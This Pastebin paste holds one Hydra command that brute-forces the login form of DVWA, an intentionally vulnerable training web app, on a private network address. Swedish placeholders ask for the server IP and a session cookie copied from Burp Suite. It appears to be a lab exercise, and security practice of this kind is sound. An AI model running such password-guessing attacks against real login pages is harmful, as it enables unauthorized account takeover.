Advertisement
Guest User

Untitled

a guest
Apr 8th, 2019
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. hydra 192.168.20.(serverns ip) -l admin -P /usr/share/john/password.lst http-get-form “/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: PHPSESSID=(ditt id som du kopiera från Burpsuite); security=low” -V
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement